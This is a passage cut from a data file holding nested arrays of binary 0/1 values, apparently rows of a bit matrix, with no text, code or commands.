0,0,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,0],[0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1],[1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,0,1,0,1,1,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,0,1,1,1],[1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1],[0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,1],[0,1,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,0,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1],[1,0,0,0,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,0],[1,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,0,1,0,1,1,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,1,0],[0,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,0,1,1,1,1,0,0,0,1],[1,1,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,1,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0],[0,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,0,0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,0,1,0,0],[0,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,0,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0],[0,1,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,0,1,1,0,1,1,0,0,0,0,1,0,0,1,1],[0,1,0,1,0,1,0,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,1,1,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,0,1,1,1,1,1,0,0,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,1,0,1,0,0,0,1,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,0,0],[1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1],[0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,1,1,1,0,0,0,1,1,1,0],[1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,0,0,1,1,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1],[1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0],[1,1,0,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1],[0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0],[1,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,0,0,0,1,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0],[0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1],[0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0],[0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1],[0,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,0,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1],[0,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,0,1],[1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,0,0,1,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,0,1,0,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,0,0,1,1,0],[1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,1],[0,1,0,1,0,0,1,0,0,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,1,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,0,1,1,1,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0],[1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,1],[0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,1,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0],[1,1,0,1,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0,1,1,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1],[1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0],[1,1,0,1,0,1,0,1,1,1,0,0,0,1,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1,0,0,0,0,1,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,1,0,1,0],[0,1,1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,1,0,1,0,0,0,1,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],[0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,0,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,1,1,0,1,0,0,0,0,0,1,0,1,0,1],[1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,1,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1],[0,1,1,1,1,0,0,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,0,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0,1,0,1,1,1,0,0,0,1